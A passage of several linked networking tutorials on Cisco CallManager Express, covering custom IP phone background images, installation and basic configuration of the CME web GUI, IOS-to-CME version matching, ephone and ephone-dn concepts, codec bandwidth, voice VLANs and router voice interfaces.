extracting Desktops/320x212x12/Fountain.png (138278 bytes)!
extracting Desktops/320x212x12/List.xml (726 bytes)
extracting Desktops/320x212x12/MorroRock.png (109076 bytes)
extracting Desktops/320x212x12/NantucketFlowers.png (108087 bytes)!
extracting Desktops/320x212x12/TN-CampusNight.png (10820 bytes)
extracting Desktops/320x212x12/TN-CiscoFountain.png (9657 bytes)
extracting Desktops/320x212x12/TN-CiscoLogo.png (2089 bytes)
extracting Desktops/320x212x12/TN-Fountain.png (7953 bytes)
extracting Desktops/320x212x12/TN-MorroRock.png (7274 bytes)
extracting Desktops/320x212x12/TN-NantucketFlowers.png (9933 bytes)
Desktops/320x216x16/ (directory)
extracting Desktops/320x216x16/List.xml (726 bytes)
Desktops/320x212x16/ (directory)
extracting Desktops/320x212x16/List.xml (726 bytes)
[OK - 641024 bytes]
R1#

Extraction of the 'backgrounds.tar' file will create a root 'Desktops' directory. Under this directory, three directories are created: 320x212x12, 320x216x16 & 320x212x16. The naming of these directories relates to the resolution of the images they contain (e.g. 320x212) and their colour depth (e.g. x12). As such, different IP Phone models will look in the appropriate directory to find image files suited to their LCD screen.

For example, a Cisco CP-7965 IP phone will automatically search in the Desktops/320x212x16/ directory for a list of image files.

In each directory (e.g. 320x212x12) there are three types of files:

1) imagename.png

2) TN-imagename.png

3) List.xml

It is very important to understand the purpose of each file. Please note that filenames are case-sensitive in the Cisco IOS.

  • The imagename.png file is the image the IP phone will load when selected as a new background.
  • The TN-imagename.png file is the thumbnail version of imagename.png. When a user selects the Background Images menu, they will be presented with the thumbnail versions of the available images. If the thumbnail file for a specific image does not exist, a portion of the full-resolution image will be displayed instead.
  • The List.xml file is an XML file that contains the path and list of the available images and their thumbnails. The List.xml file can include up to 50 background images, and the images appear in the Background Images menu on the phone in the order they are listed.

For each image, the List.xml file contains one element type, called ImageItem. The ImageItem element includes the following two attributes:

a) Image. The path that specifies where the phone obtains the thumbnail image

b) URL. The location of the actual image file

Below is an example of the List.xml file, showing the location of the thumbnail and full resolution image of CampusNight.png:

<ImageItem Image="TFTP:Desktops/320x212x12/TN-CampusNight.png"
URL="TFTP:Desktops/320x212x12/CampusNight.png"/>

The List.xml file is the same file for all three directories. If an additional background image is uploaded on to the system, you must edit the List.xml file and upload it to all three directories, overwriting the existing file.

Essentially, all images are stored in one directory (usually Desktops/320x212x12) and all IP phones are directed to that directory through the List.xml files.
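
For reference, a complete List.xml file typically wraps these ImageItem entries in a CiscoIPPhoneImageList element. The minimal sketch below is an assumed example listing just two of Cisco's default backgrounds; check the exact wrapper element and paths against the List.xml shipped in 'backgrounds.tar':

<CiscoIPPhoneImageList>
<ImageItem Image="TFTP:Desktops/320x212x12/TN-CampusNight.png"
URL="TFTP:Desktops/320x212x12/CampusNight.png"/>
<ImageItem Image="TFTP:Desktops/320x212x12/TN-Fountain.png"
URL="TFTP:Desktops/320x212x12/Fountain.png"/>
</CiscoIPPhoneImageList>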

Step 2 - Serving The Files To Our IP Phones

Once the files are loaded on the CME router, it is necessary to enter the appropriate tftp-server commands so that List.xml and all .png files are served to the IP phones via the router's TFTP server:

tftp-server flash:Desktops/320x212x12/CampusNight.png
tftp-server flash:Desktops/320x212x12/CiscoFountain.png
tftp-server flash:Desktops/320x212x12/MorroRock.png
tftp-server flash:Desktops/320x212x12/NantucketFlowers.png
tftp-server flash:Desktops/320x212x12/Fountain.png
tftp-server flash:Desktops/320x212x12/CiscoLogo.png
tftp-server flash:Desktops/320x212x12/TN-CampusNight.png
tftp-server flash:Desktops/320x212x12/TN-CiscoFountain.png
tftp-server flash:Desktops/320x212x12/TN-MorroRock.png
tftp-server flash:Desktops/320x212x12/TN-NantucketFlowers.png
tftp-server flash:Desktops/320x212x12/TN-Fountain.png
tftp-server flash:Desktops/320x212x12/TN-CiscoLogo.png
tftp-server flash:Desktops/320x212x12/List.xml
tftp-server flash:Desktops/320x216x16/List.xml
tftp-server flash:Desktops/320x212x16/List.xml

Inserting Custom Background Images

In most cases, you will want to load your own custom images. For example, we created our own Firewall.cx background image and loaded it onto our IP phones.

Here's the necessary procedure and final result:

1) Create a .png image with dimensions of 320x212 pixels. We did not bother creating the thumbnail version:

tk-cisco-ccme-ipphone-bgnd-8

2) Edit the List.xml and append the newly created image:

<ImageItem Image="TFTP:Desktops/320x212x12/firewall-cx-logo.png"
URL="TFTP:Desktops/320x212x12/firewall-cx-logo.png"/>

3) Load the image into the 'Desktops/320x212x12/' directory.

R1# copy tftp flash://Desktops/320x212x12/
Address or name of remote host []? 10.0.0.10
 Source filename []? firewall-cx-logo.png
 Destination filename [/Desktops/320x212x12/firewall-cx-logo.png]? [hit enter]
Accessing tftp://10.0.0.10/firewall-cx-logo.png...
 Loading firewall-cx-logo.png from 10.0.0.10 (via FastEthernet0/0): !
 [OK - 34493 bytes]

34493 bytes copied in 0.792 secs (43552 bytes/sec)

4) Load the modified List.xml file into all three directories (320x212x12, 320x212x16 & 320x216x16), overwriting the existing file. We only show the process for one of the three directories:

R1# copy tftp flash://Desktops/320x212x12/
Address or name of remote host [10.0.0.10]? [Hit enter]
Source filename [firewall-cx-logo.png]? List.xml
 Destination filename [/Desktops/320x212x12/List.xml]? [Hit enter]
%Warning:There is a file already existing with this name
Do you want to over write? [confirm] [Hit enter]
Accessing tftp://10.0.0.10/List.xml...
 Loading List.xml from 10.0.0.10 (via FastEthernet0/0): !
 [OK - 845 bytes]

845 bytes copied in 0.440 secs (1920 bytes/sec)

5) Enter the appropriate tftp-server commands to load the new image file and make it available to the IP phones to download:

R1(config)# tftp-server flash:Desktops/320x212x12/firewall-cx-logo.png

We are now ready to load the new background image onto our IP phone by selecting Settings > User Preferences > Background Images.

Notice that the IP phone will show a thumbnail version which essentially is our background image - cropped. This is because we did not create a proper thumbnail version of the background image.

Once we select the new file and save our selection, the IP phone will display it. Below is the final result on our 7945G IP phone:

tk-cisco-ccme-ipphone-bgnd-9

Firewall.cx has made the Cisco IP Phone 'backgrounds.tar' file & custom Firewall.cx background image, available in our Cisco IP Phone Software download section.

Be sure to install the backgrounds.tar file mentioned at the beginning of this article, to create the necessary directory structure on your router's flash.

Summary

In this article we explained how to install and load background images on Cisco IP phones. We examined the files involved and the procedure that needs to be followed to create and load custom background image files. Lastly, we also provide our custom-made Firewall.cx background image and Cisco's standard images as a free download.

 


CallManager Express GUI Software Installation & Configuration - Part 2

This article covers the installation of Cisco's CallManager Express on Cisco routers. Here you'll find the necessary installation commands, files to download and the router's HTTP server configuration commands, alongside the commands to activate the web CME interface and access it via a web browser.

Installing the CallManager Express GUI Files

As mentioned in our previous article CallManager Express GUI Software Installation & Configuration - Part 1, we'll be installing the file containing the basic CallManager GUI files. This is common practice, preferred over the full version, as free space on the system's flash is often a problem.

The 40MB .tar file (cme-basic-7.1.0.1.tar) should just about fit on a system with 128MB of flash that already contains the Cisco IOS. While this file can be viewed using Winzip, it is intended to be extracted directly onto your CallManager platform using the CLI.

Using the necessary commands, the cme-basic-7.1.0.1.tar file is extracted directly onto the device's flash memory. This means you must ensure you have enough free space on your router or UC500 flash, otherwise the extraction process will fail.

To extract the file, launch a TFTP server, ensure the .tar file is accessible by the TFTP server, then issue the command below:

R1# archive tar /xtract tftp://10.0.0.10/cme-basic-7.1.0.1.tar flash:
Loading cme-basic-7.1.0.1.tar from 10.0.0.10 (via FastEthernet0/0): !
extracting APPS-1.2.1.SBN (2593969 bytes)!!!!!!!!!!
extracting apps11.8-4-1-23.sbn (2925555 bytes)!!!!!!!!!!!

The 'archive tar /xtract' command tells the router or UC500 to load the .tar file from our TFTP server and extract it directly onto the router's flash. In total, our example had 132 files, of which only 18 are the essential GUI files.

Opening the .tar file using Winzip and locating the files with the path 'gui\' will reveal the GUI related files:

In the worst-case scenario, if there is limited space on the CallManager Express flash memory, simply extract the files with the 'gui\' path and upload them individually in the root directory of your flash memory.

Once the files are uploaded to the router's flash, the next step is to enable the router's HTTP server, configure the authentication method so that the router uses its local user accounts for authentication, create a local user account with privilege 15 access, and finally lower the file privilege level required for file operations. The 'file privilege' command is necessary, otherwise we might experience telephony_service_server_get_action url:/ccme.html errors without any web page loading:

R1(config)# ip http server
R1(config)# ip http authentication local
R1(config)# username firewall privilege 15 secret mysecret
R1(config)# file privilege 0

Alternatively, for increased security, it is possible to specify a user that will only be used for the CallManager Express GUI interface. This user will not have any other type of access to the CCME router as it is not considered a 'local account':

R1# configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)# telephony-service
R1(config-telephony)# web admin system secret 0 mysecret

When entering the password or secret, type 0 indicates a non-encrypted (plain-text) password, whereas type 5 indicates an encrypted password.

We are now ready to access the Cisco CallManager Express GUI Interface using the following URL: http://10.0.0.1/ccme.html. This example assumes that the CallManager Express system is on IP address 10.0.0.1.

When typing the URL in our web browser, the system will request for a username and password. We enter the credentials accordingly and are presented with the CallManager Express homepage:

tk-cisco-ccme-gui-p2-2

From here, we are able to configure basic system parameters, ip phone devices, create and assign extensions, receive basic call reports and much more.

The scope of this article covers only the basic system parameters; the rest will be covered in future articles.

To begin setting up the basic system parameters, select 'Configure > System Parameters'. This will load the system parameter page, where a number of options are available:

tk-cisco-ccme-gui-p2-3

The most important parameters are outlined below:

  • Administrator's Login Account - create or reset new CCME GUI accounts.
  • Date and Time Format - The date/time format displayed on the IP Phones.
  • IP Phone URLs - The URLs IP Phones must use in order to access advanced features such as XML services or the Internet.
  • Max. Number of IP Phones - The maximum number of IP Phones allowed to register to our CCME system. This number cannot be more than the max. number of phones supported by the system.
  • System Message - The message or company name displayed on all IP Phones.
  • System Time - Allows the setting of year, month, day and time. If this option is not available, it will be necessary to enter the 'time-webedit' command under the 'Telephony-service' section using the CLI prompt.
  • Timeout - The interdigit timeout (how long the system waits while a user is entering a phone number before timing out), ringing timeout and busy timeout, in seconds.
  • Transfer Patterns - The pattern of destination phone number(s) allowed when transferring calls to external numbers. E.g. to allow an incoming call to be transferred to an external mobile (by placing another call), the mobile's number or a matching pattern must be entered here, otherwise the system won't permit it.
  • MOH File - Music-On-Hold file. This is the music file played when a caller is placed on hold. The file is sampled at 8kHz, mono, 8-bit and saved in .wav A-law/mu-law format.

As the parameters are set, the data entered is translated into CLI commands and placed under the 'telephony-service' section of the router's or UC500's configuration.

Below is the 'telephony-service' configuration from a working CCME system. Notice that there are a lot more commands present than are available from the web interface; however, it is fairly easy to locate the ones covered by the GUI. In-depth analysis and configuration of the telephony-service section will be covered in another article:

R1# sh run | sec telephony-service
telephony-service
video
maximum bit-rate 300
max-ephones 30
max-dn 100
ip source-address 10.0.0.1 port 2000
auto assign 1 to 100
service phone videoCapability 1
timeouts interdigit 4
system message Firewall.cx
url services http://10.0.0.4/
network-locale GB
load 7914 S00104000100
load 7906 SCCP11.8-2-2SR1S
load 7911 SCCP11.8-2-2SR1S
load 7921 CP7921G-1.1.1
load 7931 SCCP31.8-2-2SR1S
load 7941 SCCP41.8-3-3S
load 7942 SCCP42.8-3-2S
load 7945 SCCP45.8-3-2S
load 7962 SCCP42.8-3-2S
load 7965 SCCP45.8-3-2S
load 7975 SCCP75.8-3-2S
time-zone 24
time-format 24
date-format dd-mm-yy
voicemail 88
max-conferences 8 gain -6
moh flash:north-gate.wav
multicast moh 239.10.16.4 port 2000
web admin system name admin secret 5 tLhc4.7jdhwlZp96HjC.
dn-webedit
time-webedit
transfer-system full-consult
transfer-pattern 4.
transfer-pattern 6948......
after-hours pstn-prefix 4 4
night-service code *1234
create cnf-files version-stamp Jan 01 2002 00:00:00

Once complete, Cisco CallManager Express is ready to accept new IP phones and extensions.

As a last note, we should warn that Mozilla Firefox seems to have issues handling the JavaScript the GUI interface uses. This is especially evident when trying to assign extensions to physical IP phone buttons.

If you are using Mozilla Firefox and stumble into problems with the GUI interface, try switching to Internet Explorer - as amazing as it might sound, no problems have been encountered with it so far!

Summary

This article covered the Cisco CallManager Express GUI interface and how it relates to different IOS versions. We examined the CCME version contained in each IOS and where to obtain the necessary files.

We also saw the information contained in each CallManager Express specification page, how to select and download the appropriate CCME GUI files and what they contain.

Closing, we showed how to install the Cisco CallManager Express GUI files onto a Cisco router or UC500 series platform and provided the necessary commands required to get the GUI working. Basic system parameters were also covered, giving a view of the available options for Cisco CallManager Express.


CallManager Express GUI Software Installation & Configuration - Part 1

cisco-ccme-gui-part-1-1

Cisco CallManager Express, also known as CME or CCME, runs on both Cisco ISR routers and the UC500 platform, including the UC520, UC540 and UC560.

CallManager Express's PBX functionality is built into the IOS that runs on all the above devices. When the router or UC500 series device loads the IOS, the administrator is able to start configuring VoIP services as required.

One of the most common questions regarding CallManager Express configuration is what methods are available to actually configure the product?

Depending on the platform, there are currently up to three different ways to configure CallManager Express. If CallManager Express is running on an ISR router (2800, 3800, 2900 & 3900 series), users have the web GUI and Command Line Interface (CLI) at their disposal, whereas users on the UC500 platform also have the Cisco Configuration Assistant (CCA) tool - an application that installs and runs on a workstation and guides you through a step-by-step menu to easily set up your VoIP PBX.

The common methods between the two platforms (ISR & UC500) are the Cisco CallManager Express Graphical User Interface (GUI) and the CLI. This article explains how to install and configure the Cisco CallManager Express GUI and also covers the most important configuration options it offers.

Matching IOS & GUI Files

Engineers who have dealt with Cisco CallManager Express will have noticed that its version changes depending on the IOS version. As noted in our Cisco CallManager Express introduction page, the CallManager Express service is embedded inside the Cisco IOS. The newer the IOS, the newer the CallManager Express version you get.

Remember that up to IOS version 12.4.26, only the following IOS feature sets have CallManager Express capabilities embedded:

- SP Services
- Adv. IP Services
- Adv. Enterprise Services

As of IOS version 15.0, Cisco has replaced all previous IOS feature sets with one universal IOS that includes all the features of the previous (12.4) versions, but requires you to purchase the correct activation license to enable the additional services you need.

For example, VoIP services such as CallManager Express are covered under the Unified Communications (UC) license. Purchasing and installing the UC activation license will enable these features.
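
As an indicative sketch only (the exact syntax, package name and licensing steps vary by platform and IOS release), enabling the UC technology package on a 2900-series ISR G2 router typically looks along these lines, followed by a reload for the license to take effect:

R1(config)# license boot module c2900 technology-package uck9
R1(config)# end
R1# copy running-config startup-config
R1# reload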

The table below illustrates the Cisco IOS releases, CallManager Express versioning and CallManager Express GUI version that should be used or installed on the device (router or UC500):

Cisco IOS Release    Cisco Unified CME Version    Cisco Unified CME GUI Version    Specifications Link
15.2(2)T             9.0                          9.0.0.0                          CME 9.0 Link
15.1(4)T             8.6                          8.6.0.0                          CME 8.6 Link
15.1(3)T             8.5                          8.5.0.0                          CME 8.5 Link
15.1(2)T             8.1                          8.1.0.0                          CME 8.1 Link
15.1(1)T             8.0                          8.0.0.0                          CME 8.0 Link
15.0(1)XA            8.0                          8.0.0.0                          CME 8.0 Link
15.0(1)M             7.1                          7.1.1.0                          CME 7.1 Link
12.4(24)T            7.1                          7.1.0.0                          CME 7.1 Link
12.4(22)T            7.0(1)                       7.0.0.1                          CME 7.0 Link
12.4(20)T            7.0                          7.0.0.0                          CME 7.0 Link
12.4(15)XZ           4.3                          4.3.0.0                          CME 4.3 Link
12.4(11)XW9          4.2                          4.2.0.4                          CME 4.2 Link
12.4(15)T            4.1                          4.1.0.2                          CME 4.1 Link
12.4(11)T            4.0(2)                       4.0.3.1                          CME 4.0(2) Link
12.4(9)T             4.0(0)                       4.0.0.1                          CME 4.0 Link
12.4(6)T             3.4                          3.4.0.1                          CME 3.4 Link

It is evident that there is a wide range of versions to select from and, as a general rule of thumb, the latest is the best option.

From experience, most versions are stable enough for a production environment; however, 12.4(22)T is an extremely buggy IOS version, especially when VPN tunnels are involved. It's best to avoid it.

As soon as the IOS version running on the router is identified, you'll need to download and install the necessary CME software and phone firmware files from the Cisco Software Download center.

For example, assume IOS version 12.4(24)T (SP Services, Adv. IP Services or Adv. Enterprise edition) is installed on the router. According to the above table, it contains CME version 7.1 and will therefore require the relevant GUI files.

Note: You can also download the CCME GUI Interface files directly from Firewall.cx. For more information, visit our CCME GUI Download article.

To obtain and install these files, follow the relevant link on the column named 'Specifications Link'. This will load Cisco's page where you'll be able to find all necessary files for the CME version you require.

The Specifications Link page includes a wealth of information, including:

  • Supported Cisco IP Phones
  • Necessary firmware version for each IP Phone supported
  • Supported platforms, e.g. Cisco 1861, 2801, 2811, 2911 etc.
  • Supported devices per platform, e.g. a Cisco 1861 will support up to 12 IP Phones with CME version 7.1
  • DRAM & Flash memory requirements for the specific CME version
  • Compatible voice products, e.g. Unity Express, VG224 and more

The Specifications Link page is extremely important as it can help you examine if you meet the requirements and save you a lot of time and trouble. It is strongly suggested the whole page is read, so the information contained is clearly understood.

When ready, click on the 'Cisco Software Download' link as shown below, to proceed with the download of the CME GUI files:

tk-cisco-ccme-gui-p1-1

This link will take you directly to the Cisco download area. Bear in mind that this will require a CCO account and possibly an account with permissions to download this software, otherwise no access will be provided.

As shown, the download area contains files for all CME versions, but the system will take you directly to the one selected, for our example, version 7.1.

If there's a small difference in the version, e.g. 7.1.0.1 instead of 7.1.0.0, it doesn't really matter, as it's more likely to contain small bug fixes and shouldn't create any problems.

tk-cisco-ccme-gui-p1-2

Notice that there are two similar files from which you can select: one named 'basic' and the other 'full'. The difference between them is purely the number of files included.

Here's the description for the 'Full Download':

CME 7.1 Full System Files for IOS 12.4(24)T releases. Includes MOH, Ringtones, 7970/71/75 Backgrounds, the following phone loads (7906/11, 7921/25, 7931, 7937, 7941/61, 7942/62, 7945/65, 7970/71, 7975) and updated GUI files for 12.4(24)T

And the 'Basic Download':

CME 7.1 basic system files for IOS 12.4(24)T releases, includes Basic Phone Loads (7906/11, 7921, 7937, 7941/61, 7942/62) with updated GUI for 12.4(24)T

Since the difference between the two is only 30Mb, it is suggested to always download the full version, regardless of whether it is immediately required. It can be stored away just in case it is needed in the future. For this example, we will download both files, but install the one containing the basic system files.

To continue reading about the installation process of the Cisco CallManager Express GUI, please continue to Part 2 of our guide.




Cisco CallManager Express Basic Concepts - Part 2

Our previous article, Cisco CallManager Express Basic Concepts - Part 1, covered the very basic concepts of CCME and its operation. This article continues with the Cisco CallManager Express basic concepts and examines the ephone and ephone-dn concepts, how to configure IP phones, and VoIP bandwidth considerations.

Understanding Ephone & Ephone-dn

The Cisco CallManager Express system consists of a router (or simply a 'box' for the UC 500 series) that serves as a voice gateway (PBX) and one or more VLANs that connect IP phones and phone devices to the router.

tk-cisco-ccme-basic-concepts-8

All types of PBXs consist of physical phones and their internal directory numbers (extensions). The same concept applies in CallManager Express. The physical phones are referred to as 'ephones', which stands for 'Ethernet Phone', and the directory numbers as 'ephone-dn', short for 'Ethernet Phone Directory Number':

tk-cisco-ccme-basic-concepts-9

An ephone can represent any type/model of physical phone available and supported by Cisco. CallManager Express will recognise a physical phone device from its ephone configuration which also contains the device's MAC address.

For example, a Cisco 7945 IP Phone with a MAC address of 0027.0D3F.30B8 represents the ephone. Directory number 32 assigned to this phone represents the ephone-dn number.

Directory numbers are assigned to line buttons on phones during configuration.

This means that each physical IP Phone must be configured as an ephone. Cisco CallManager Express will recognise the physical phone from its ephone configuration MAC Address parameter.

tk-cisco-ccme-basic-concepts-10

Configuring an IP Phone in CME is a straightforward process and involves the creation of an ephone and ephone-dn entry.

The ephone holds the phone's MAC address and button configuration, while the ephone-dn holds the directory number assigned to the IP Phone.

In the example above, the ephone 1 configuration binds the phone's first button (button 1) to the ephone-dn 20. Since ephone-dn 20 has been configured with directory number 300, the IP Phone will be assigned directory number 300.

To ensure we understand this concept, consider the following example:

tk-cisco-ccme-basic-concepts-11

Using the same scenario, we've created three ephone-dn entries, a total of three directory numbers. We would now like to assign directory number 380 to Phone 1. All that is required is to map button 1 to the appropriate ephone-dn that contains number 380, that is, ephone-dn 22. To achieve this, we issue the button 1:22 command under the ephone 1 configuration. IP Phone 1 now has directory number 380!
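
To tie this to the CLI, below is a minimal sketch of the above example (assuming CCME is already enabled, and reusing the 7945 phone and MAC address mentioned earlier; your ephone/ephone-dn tags and phone type will differ):

R1(config)# ephone-dn 22
R1(config-ephone-dn)# number 380
R1(config-ephone-dn)# exit
R1(config)# ephone 1
R1(config-ephone)# mac-address 0027.0D3F.30B8
R1(config-ephone)# type 7945
R1(config-ephone)# button 1:22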

VoIP Bandwidth - Codecs

VoIP calls, just as any other network resource, require bandwidth. The amount of bandwidth required per call is governed by the type of codec configured by the system. Cisco CME and UC500 series support a variety of different codecs, making the system extremely flexible to cover any requirement.

By default, the codec used by CallManager Express and the UC500 series is G.711, which requires 64Kbps of bandwidth, the same amount used by telecommunication providers for one call. Note that 64Kbps is the voice payload only; once encapsulated into an Ethernet frame, the total bandwidth is the payload plus the packet overhead, bringing the total to 87.2Kbps. This is the actual bandwidth required per call, per phone, on an Ethernet network.
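
To see where the 87.2Kbps figure comes from, assuming the default 20ms packetisation (50 packets per second): each packet carries 160 bytes of G.711 payload plus roughly 40 bytes of RTP/UDP/IP headers and 18 bytes of Ethernet framing, giving 218 bytes, or 1,744 bits, per packet. Multiplying 1,744 bits by 50 packets per second gives 87,200bps, i.e. 87.2Kbps per call in each direction.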

The amount of 87.2 Kbps might not seem large for an Ethernet network, however, when we need to pass the call over a WAN network this changes completely. WAN networks require bandwidth-optimised applications and services and there is no exception for VoIP calls.

For this reason, when we are dealing with situations that require optimised bandwidth control, we switch to different codecs that have much smaller bandwidth requirements, essentially allowing us to conserve precious bandwidth and money. In these cases, the G.729 codec is usually preferred, requiring only 31.2 Kbps, a generous saving of 56Kbps! In practice, this means that you can squeeze almost three G.729 VoIP calls using the same amount of bandwidth required by one G.711 VoIP call!
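
The same arithmetic explains the 31.2Kbps figure: a 20ms G.729 packet carries only 20 bytes of payload plus the same 58 bytes of overhead, giving 78 bytes (624 bits) per packet, and 624 x 50 = 31,200bps. Below is a rough sketch of how G.729 might be selected for calls matched by a VoIP dial-peer (the dial-peer tag, destination pattern and session target are hypothetical values used only for illustration):

R1(config)# dial-peer voice 100 voip
R1(config-dial-peer)# destination-pattern 5...
R1(config-dial-peer)# session target ipv4:10.1.1.1
R1(config-dial-peer)# codec g729r8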

Apart from the evident difference in bandwidth requirements for each codec, there is also a noticeable difference in the quality of the call, G.711 being far superior in comparison with the G.729. To help provide an example, the quality of a G.711 call is similar to that of a call made between two ISDN land lines whereas a good example of G.729 quality would be a call between two mobile phones.

Taking into consideration that the quality of mobile phone calls is acceptable to most people today, not many would complain if they had the same quality for site-to-site calls.

Of course there are other codecs that require a different amount of bandwidth, however, the two most important and popular are the G.711 and G.729 codecs. These codecs can be further configured to change their bandwidth requirements, but that's a topic to be covered in the future.

Summary

This article covered the ephone and ephone-dn concepts, how IP phones are configured in CallManager Express, and VoIP bandwidth and codec considerations for CME and the UC500 series appliances (including UC520, UC540 & UC560). Users interested can also read our Cisco CallManager Express Basic Concepts - Part 1 article.

 


Cisco CallManager Express Basic Concepts - Part 1

This article introduces basic CallManager Express (CCME) concepts by covering how a CCME router operates, how calls are set up between Cisco IP phones, and the role of the CCME router in this process. We'll talk about the importance of a Voice VLAN, allowing the segmentation of voice and data traffic, and how this is achieved. Next, we cover the interfaces (or ports) of a Cisco CME router: ISDN, FXS, FXO and other interfaces. Lastly, we take a look at the all-in-one Cisco UC devices (UC 500 series) designed for small businesses that require CME, router, firewall and wireless controller bundled into one box.

How CCME, UC500, UC520, UC540 & UC560 Work

Before we plunge into CME initialisation & configuration, we need to introduce a few concepts and become familiar with them.

Understanding how basic functions of CallManager Express operate is crucial for the correct configuration and operation of the system. As mentioned, the CME runs on the Cisco router and provides its services to the network. IP Phones connected to the network via a switch are used to handle incoming and outgoing calls.

Once power is on, the IP phones will boot up and register with the Cisco CallManager Express. If configured, the CallManager Express will provide an extension for each IP phone and is then able to set up or tear down calls to or from the IP phones. The IP phones and CallManager Express router use a proprietary protocol called Skinny Client Control Protocol (SCCP) to communicate.
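
Once the phones have registered, one quick way to confirm their status from the CCME router's CLI is with the following commands (an indicative example; the exact output varies by CME version):

R1# show ephone registered
R1# show ephone summary

The first command lists each registered ephone along with its MAC address and button assignments, while the second provides a brief one-line summary per phone.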

Below is a diagram illustrating roughly what goes on when one IP phone dials another IP phone, both connected to the same CallManager Express.

When a call is placed between two IP phones under the control of CallManager Express, the SCCP protocol is used to set the call up. SCCP is also commonly known as the 'skinny' protocol. The SCCP protocol is not used between two IP phones, but only between the IP phone and the Cisco CME system.

tk-cisco-ccme-basic-concepts-p1-1

Once the call is set up, the Realtime Transport Protocol (RTP) will be used to carry the audio stream. RTP is used to carry voice inside of IP packets. RTP is a common protocol that is used to carry time-sensitive traffic like voice and real-time video. RTP is carried inside of a UDP segment, which is then carried inside an IP packet.

When the telephone session between the two IP phones ends and they hang up, a signal will be sent from each IP phone to CME to inform the server of their new status.

Voice VLAN - Separating Data and Voice Traffic

Just like any network device, IP phones generate traffic during a call. This is defined as Voice over IP, or VoIP, traffic. VoIP traffic is extremely sensitive to network delays caused by bottlenecks and insufficient bandwidth. If there is a lot of traffic on the network, chances are there will be problems with the voice stream between the IP Phones and the CME, with voice clipping and jitter being the most common VoIP problems faced by networks.

To overcome these problems, Cisco always recommends isolating VoIP traffic from data traffic, no matter how large or small your network is. The isolation of VoIP traffic is accomplished by the creation of a separate VLAN marked as the 'Voice VLAN'. Cisco switches have built-in mechanisms that will automatically identify and prioritise VoIP traffic. This type of design ensures that VoIP packets have higher priority than other packets, hence minimising or eliminating the type of problems described.

If you are not familiar with the VLAN concept, you can read all about it in our VLAN section. It includes an in-depth analysis of the concept and contains diagrams to help the learning process.

To help get the picture, here is an example of a typical network that contains a Cisco CME router connected to the Internet and the PSTN network, along with a Cisco voice-capable switch (one able to identify voice packets), a couple of workstations and IP phones.

The concept is pretty straightforward; however, pay attention to how the Cisco CME router connects to the local network and how some IP phones connect to the network with workstations behind them. Because IP phones occupy a network port to connect to the local area network, Cisco has equipped most IP phones with a built-in switch, allowing a workstation to connect directly to the IP phone.

This method obviously has the advantage of cutting in half the switchports required for IP phones and workstations. In this scenario, the link from the switch to the IP phone is configured as a 'Trunk' link, whereas the link between the IP phone and the workstation is configured as an 'Access' link.

Trunk links allow traffic from all VLANs to pass through them, whereas Access links allow only specific VLAN traffic. In our example, we have Access Links belonging to the Data VLAN (for the workstations) and also Voice VLAN (for the IP phones).

The general idea is that we use trunk links to the IP phone and from there an access link is provided for the network device, usually a workstation. If there is only one device connecting through one port, then this can also be configured as an access link assigned to the VLAN required.
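
As a rough illustration of this idea on a Catalyst access switch (a sketch only, assuming hypothetical VLAN IDs of 10 for data and 20 for voice, and FastEthernet0/5 as the port facing the phone):

Switch(config)# vlan 20
Switch(config-vlan)# name VOICE
Switch(config-vlan)# exit
Switch(config)# interface FastEthernet0/5
Switch(config-if)# switchport mode access
Switch(config-if)# switchport access vlan 10
Switch(config-if)# switchport voice vlan 20
Switch(config-if)# spanning-tree portfast

With this configuration the port carries both the data and voice VLANs: the IP phone places its traffic in VLAN 20 (learned via CDP), while the workstation connected behind the phone remains in VLAN 10.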

The Cisco CallManager Express router almost always connects to the core switch via a trunk link, and has access to both Data and Voice VLANs as it should. Workstation traffic is routed to the Internet via the Data VLAN, whereas voice traffic is routed to the PSTN network via the Voice VLAN.

Router Interfaces - Voice Interfaces for CallManager Express

The Cisco CallManager Express system can act as the PSTN gateway as well as managing the IP phones. There are different types of connections to the PSTN, including digital, VoIP and analog connections. The type of connection used will depend on the density of connections needed, the technology available in the region, the cost of the connections and the interfaces present on the router.

The example below shows a Cisco 2801 router populated with 4 interfaces. Each interface is inserted into one of the available four slots and, once the router is powered up, if the IOS supports the interface installed it will automatically recognise it and provide the engineer access to the appropriate CLI commands so it can be configured.

tk-cisco-ccme-basic-concepts-p1-3

At this point, it is important to mention that there are over 90 different interface cards that can be used on Cisco routers. The two main types of interfaces are the Data interfaces and Voice interfaces.

As the name implies, 'data interfaces' terminate WAN connections used to transfer/route data, whereas 'voice interfaces' terminate analogue or digital voice networks such as PSTN, ISDN or PRI (E1/T1) lines, all used to carry voice.

Data interface examples are ADSL, serial and ISDN data cards. Below is a serial data interface card, normally used to terminate leased lines connecting remote company offices with their headquarters:

tk-cisco-ccme-basic-concepts-p1-4

Voice interface examples are ISDN Voice cards, FXO (PSTN) and FXS cards. Below is a 4 port FXO card, used to terminate PSTN lines from the telco directly to the CCME router:

tk-cisco-ccme-basic-concepts-p1-5

The Cisco 2801 router in our example is able to handle up to four interface cards, of which a maximum of two can be data interface cards. This allows the following combinations:

a) 2 Data interface cards + 2 Voice interface cards

b) 4 Voice interface cards

Understanding a router's capabilities, capacity and where each voice card is used is critical to the design of a VoIP network and selection of the CME router. Cisco provides extensive information on all routers and available cards making it a lot easier to build your configuration.

Unified Communications 500 Series (includes UC520, UC540 & UC560)

tk-cisco-ccme-basic-concepts-p1-6

The Cisco Unified Communications 500 series is what many call a 'Cisco Swiss Army Knife'.

The UC500 series practically bridges a big gap in the Small-Medium Business market, as the entry-level option before it was a Cisco router running CME-enabled software.

The UC500 series is a small appliance that combines many functions into one compact design. Functions and services include:


  • Voice Gateway functions - fully featured PBX with integrated Auto Attendant
  • Multiple interface support to PSTN/ISDN Network via FXS, FXO & ISDN Interface cards
  • Voice Mail Support
  • VoIP Phones support, including Cisco's SMB series IP Phones, 7900 series IP Phones, SIP IP Phones and many more
  • Routing support
  • Firewall
  • Wireless networking support (optional)
  • VPN Support - allows termination of IPSec (Crypto) tunnels directly on the UC

The UC500 series runs on its own software which is identical to Cisco's Advanced Enterprise IOS running on Cisco routers. Configuration commands are identical to those of CME and therefore all examples analysed in our VoIP section can be applied to the Cisco UC500 series without a problem.

Summary

This article covered the introduction to Cisco's Call Manager Express - Part 1, which runs on Cisco routers and UC 500 series appliances (including UC520, UC540 & UC560). Basic concepts of VoIP technologies were introduced along with some important configuration theory related to CME's operation. Our next article continues with the CCME Basic Concepts - Part 2.

 

 


Introduction to Cisco Unified Communication Manager Express (CallManager Express - CME)

